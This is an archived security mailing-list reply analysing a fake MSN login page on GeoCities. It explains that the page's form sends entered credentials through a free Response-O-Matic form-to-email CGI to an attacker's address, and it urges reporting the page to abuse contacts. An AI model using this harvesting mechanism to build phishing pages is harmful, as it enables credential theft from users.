lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: nick at virus-l.demon.co.uk (Nick FitzGerald)
Subject: MSN fake login website

w g <xillwillx@...oo.com> wrote:

> i put in my username and password ...

Your real username and password somewhere?

That was a bit silly, no?

> ... and nothing happened...i think
> its broken .. 

"nothing"??

When I tried it (with bogus data) I was told by the nice folk at
http://www.response-o-matic.com/ that:

   Service blocked due to spam or other abuse

   It's unfortunate that a few people choose to abuse FREE services 
   like our Response-O-Matic. The reality is that this sort of abuse 
   costs us tons of money and resources, which is one reason why we 
   need to carry advertising. You can do your part in the fight 
   against spam by responding to our advertisers' offers, like the 
   one below:

   <<snips ads, etc...>>

However, saving the page locally, changing the "your_email_address" 
field in the form to my own, loading this changed page, filling in 
the login form (with bogus data) and submitting it, it seemed to 
"work" OK (insofar as I claim to understand the service offered by 
the Response-O-Matic folk).

Thus, I concluded that the Response-O-Matic folk have also received 
complaints about this spam (?) and acted more quickly then the Yahoo! 
GeoCities abuse folk, specifically blocking normal processing of 
their rom.pl CGI used by the fake form on the fake page:

   form name="passwordform"
   action="http://www.response-o-matic.com/cgi-bin/rom.pl"

_if_ it is submitted with the "your_email_address" field set to that 
used by the bogus MSN8 signup page.  That is, Response-O-Matic no 
longer Email the data from the submission of that form to 
dna_cta@...oo.com...

> ...  i should mail microsoft and tell them about the bug 

"bug"??  What bug?

I hardly see the possibility that some users are so dense as to 
mistake a GeoCities page for a valid MSN login page as a bug or as 
something Microsoft can do anything useful about...  The Yahoo! 
and/or GeoCities abuse@... addresses, and in this case also that of
Response-O-Matic (though they've apparently already acted on this, so 
perhaps save them the extra grief for now...) are the places to get 
useful action on this incident.


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ